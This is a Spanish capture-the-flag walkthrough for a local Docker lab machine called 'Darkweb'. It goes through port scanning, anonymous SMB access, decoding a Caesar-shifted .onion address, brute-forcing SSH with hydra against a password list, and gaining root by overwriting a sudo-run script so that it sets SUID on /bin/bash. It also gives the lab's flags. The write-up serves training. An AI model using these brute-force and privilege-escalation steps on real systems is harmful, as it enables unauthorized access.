CTF Darkweb Hard
URL Download CTF = https://drive.google.com/file/d/1F9hlGGkTs8X1sOPdwp6yWl2AYHXExpbC/view?usp=sharing
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip darkweb.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_run.sh darkweb.tarInfo:
██████╗ ██╗ ██╗███╗ ██╗██████╗ ██████╗ ██╗
██╔══██╗██║ ██║████╗ ██║╚════██╗██╔══██╗██║
██████╔╝██║ █╗ ██║██╔██╗ ██║ █████╔╝██║ ██║██║
██╔═══╝ ██║███╗██║██║╚██╗██║ ╚═══██╗██║ ██║╚═╝
██║ ╚███╔███╔╝██║ ╚████║██████╔╝██████╔╝██╗
╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═╝
==
@+:@ @##@
@++:-----+@ @@#+:----:+#
#-+-----:+:---------:
*::-----++-----::::#
::------+:--------:
#-+------+:-::-----#@
*::+=@@#++-------::@
@+= @++::+#@@@#*#
#-@
*+#++@
+-:::+-@
:-:+:::+
@+::*::::
*::++-::*
=:--:-:++ @-#
#*:---:--++@ @@
@::-:--++*
@::-:++#
*++*
:: Plataforma de máquinas vulnerables ::
:: Desarrollado por Pwn3d! y Dockerlabs - creado por @d1se0 ::
█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█ FLAG{Pwn3d!_is_awesome!} █
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
[✔] bc ya está instalado.
[✔] Docker ya está instalado
[!] Limpiando previos contenedores e imágenes
[✔] Cargando la máquina virtual
[✔] Activando máquina virtual
[✔] Máquina activa. Dirección IP: 172.17.0.2
[!] Presiona Ctrl+C para limpiar y salirPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 08:13 EST
Nmap scan report for 172.21.0.2
Host is up (0.000036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 aa:df:30:8b:17:c5:3c:80:1c:88:f1:f8:c0:ac:cc:fa (ECDSA)
|_ 256 aa:6a:33:65:fc:54:b7:8f:98:ff:1f:3d:79:a3:05:3c (ED25519)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-14T13:13:29
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 secondsPor lo que vemos hay un SMB activo, por lo que vamos a intentar a enumerar los recursos compartidos del servidor:
smbclient
smbclient -L //<IP>Info:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
darkshare Disk
IPC$ IPC IPC Service (8e37253f7c68 server (Samba, Ubuntu))Vemos que hay un recurso compartido llamado darkshare y nos deja enumerar de forma anonima, por lo que vamos a ver si nos deja entrar de forma anonima al recurso compartido:
smbclient //<IP>/darkshareSi ejecutamos esto nos dejara entrar, si listamos el recurso compartido con un ls:
smb: \> ls
. D 0 Sat Dec 14 05:24:32 2024
.. D 0 Sat Dec 14 05:24:32 2024
archivesDatabases.txt N 563 Sat Dec 14 05:16:30 2024
ilegal.txt N 204 Sat Dec 14 05:24:32 2024
drugs.txt N 526 Sat Dec 14 05:17:49 2024
credentials.txt N 631 Sat Dec 14 05:17:13 2024
hackingServices.txt N 662 Sat Dec 14 05:18:19 2024Veremos que hay varios archivos, entre ellos destaca uno llamado ilegal.txt, nos lo descargaremos de la siguiente forma:
get ilegal.txtY su contenido sera el siguiente:
St qj htrufwyfx jxyf uflnsf f sfinj, xtqt vznjwt vzj qt ajfx yz, df vzj jxyt rj uzjij rjyjw jq uwtgqjrfx: q2kmnaxwhgdy2sz5wnqrarvrmuemzlfn5xewrdwxdgtdpeaxtpki6ini.tsnts
#NOTE:
use 5, you understand mePor lo que vemos el primer texto parece estar codificado en cesar y lo que dice debajo de la nota del numero 5, podemos deducir que es con un desplazamiento de 5, por lo que nos iremos a la siguiente pagina:
URL = Decoder Cesar
Configuramos en la parte de Decodificador de Cifrado César lo siguiente:
En la parte de Mensaje cifrado por Código César: ponemos:
St qj htrufwyfx jxyf uflnsf f sfinj, xtqt vznjwt vzj qt ajfx yz, df vzj jxyt rj uzjij rjyjw jq uwtgqjrfx: q2kmnaxwhgdy2sz5wnqrarvrmuemzlfn5xewrdwxdgtdpeaxtpki6ini.tsntsY en la parte de Desplazamiento/Tecla (número): ponemos el numero 5 para que sea con ese desplazamiento.
Una vez echo todo esto anterior le daremos DESCIFRAR y podremos ver lo siguiente:
No le compartas esta pagina a nadie, solo quiero que lo veas tu, ya que esto me puede meter el problemas: l2fhivsrcbyt2nu5rilmvmqmhpzhugai5szrmyrsyboykzvsokfd6did.onionPor lo que vemos es un enlace .onion la cual se puede ver con el navegador TOR, por lo que vamos a instalar en nuestra maquina host el navegador TOR para ingresar esa URL y a ver que nos muestra.
Instalar TOR
sudo apt install torbrowser-launcherO si no lo podemos descargar en la pagina oficial:
URL = Download TOR
Y tendremos que hacer lo siguiente sin ser root:
tar -xf tor-browser-linux-x86_64-14.0.3.tar.xz
cd tor-browser/
chmod +x start-tor-browser
./start-tor-browserUna vez que ya tengamos el navegador de TOR abierto le tendremos que dar al siguiente boton:
Le daremos al boton de Connect y echo esto pegaremos en la URL el siguiente link que decodificamos:
Pagina Web TOR
URL = l2fhivsrcbyt2nu5rilmvmqmhpzhugai5szrmyrsyboykzvsokfd6did.onionVeremos que nos carga una pagina web Dark Forum y si le damos a un enlace llamado Access the Darkest Web, nos llevara a una pagina web con varios links.
Si le damos a redroom 27 nos metera como en un chat, que si ponemos user paar que nos de el username, vremos lo siguiente:
acker: User located. Sending details... Username: dark, IP: 192.168.1.105, Last login: 3 days ago.Vemos que nos da un nombre de usuario llamado dark y si ahora nos vamos a otro link llamado Hidden Marketplace y le damos al boton de Purchase de la seccion llamada Confidential List's Passwords, nos llevara a un archivo TXT que contiene lo siguiente:
dark!6669
h@ck3r_p@ss
1234deadbeef
q9jp3o8gxr#4
tr1cked43x!
a9x$e5f!th
sl@ve2the$y$tem
k!ll3rbl00d#10
f0rg3tt1ng#ev3r
@rchetype#22
enigm@t1c_4c1d
#chronic_6j23
W!nT3rR1d3r!
5hadowhunter_99
t3mpor@l_hack!
blind_h@cker#17
C0mp1lex$24
f@1l1ngDarkn3ss
4llC0ntr0lsf0rmed
deadc0d3!666
W1nt3rCh3ckmate_
xX_b@ckd00r_Xx
h@ck1ng_$p@wn
K0rruptedRoot!02
s1l3nce!000
~n0_1ntrus1on~
d4rkw@ves_@_88
co_d3mned_h@ck
p!p3l0w1n$h@ck
56r!m_revelation
DarkKnight99!____
oniondarkgood
Th3%_1nvis1bl3
ph0rce_breach!X9
pr0xys3v3r!x17
kn0ck3rd00r#!23
f3ars_th3_sh@d0w
3vil_und3rworld!
8n1ghtm@r3_p@ss
p@ssw0rddark!04
h@x0r_5kyline#44
@9gr34t_0verl0rd
subtr@ct0r_ninja
r!p_@_fakeb@by
cl@nd3st!n3_2_0
777_n3ver_ch@ng3
b!llyh@cker2024
4lph@_surviv0r
Blackout!eXodus22
666root_!3
B@d#@ss__sh3l!11Por lo que tendremos que utilizar hydra para sacar las credenciales del usuario dark con la lista que obtuvimos:
SSH
hydra -l dark -P dic.txt ssh://<IP> -t 64Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-14 09:42:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 51 tasks per 1 server, overall 51 tasks, 51 login tries (l:1/p:51), ~1 try per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: dark password: oniondarkgood
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 22 final worker threads did not complete until end.
[ERROR] 22 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-14 09:42:08Vemos que nos saco las credenciales del usuario.
Por lo que nos conectaremos por ssh:
ssh dark@<IP>Metemos la contarseña oniondarkgood y estaremos dentro, por lo que leeremos la flag del user.
user.txt
2eedcb4e067f16aa9c795fd05f3056bdEscalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for dark on 994316e6d77d:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User dark may run the following commands on 994316e6d77d:
(ALL : ALL) NOPASSWD: /home/dark/hidden.pyPor lo que podremos ejecutar ese script como root, si vemos el codigo por dentro, veremos lo siguiente:
#!/bin/python3
import subprocess
# Ruta al archivo Update.sh
script_path = '/usr/local/bin/Update.sh'
# Ejecutar el script de Bash
try:
subprocess.run(['bash', script_path], check=True)
print("Script ejecutado con éxito.")
except subprocess.CalledProcessError as e:
print(f"Hubo un error al ejecutar el script: {e}")Si vemos los permisos de la carpeta donde esta contenida, veremos que somos del grupo de la carpeta y podremos eliminar el archivo Update.sh y crearlo nosotros para escalara a root.
drwxrwx--- 1 root dark 4096 Dec 14 12:22 binY dentro de la carpeta como dije esta:
-rwxrwx--- 1 root root 21 Dec 14 12:22 Update.shPor lo que haremos lo siguiente:
rm Update.shInfo:
rm: remove write-protected regular file 'Update.sh'? yCon esto ya habremos eliminado el archivo y ahora crearemos el mismo archivo pero con lo siguiente:
nano Update.sh
#Dentro del nano
#!/bin/bash
chmod u+s /bin/bashLo guardamos y ahora ejecutamos lo siguiente:
sudo /home/dark/hidden.pyNo pondra:
Script ejecutado con éxito.Y si vemos los permisos de la bash:
-rwsr-xr-x 1 root root 1446024 Mar 31 2024 /bin/bashVemos que ha funcionado, por lo que solo tendremos que poner:
bash -pY con esto ya seremos root, leeremos la flag de root:
root.txt
dee080ee744e9fb38952f236457f543bLast updated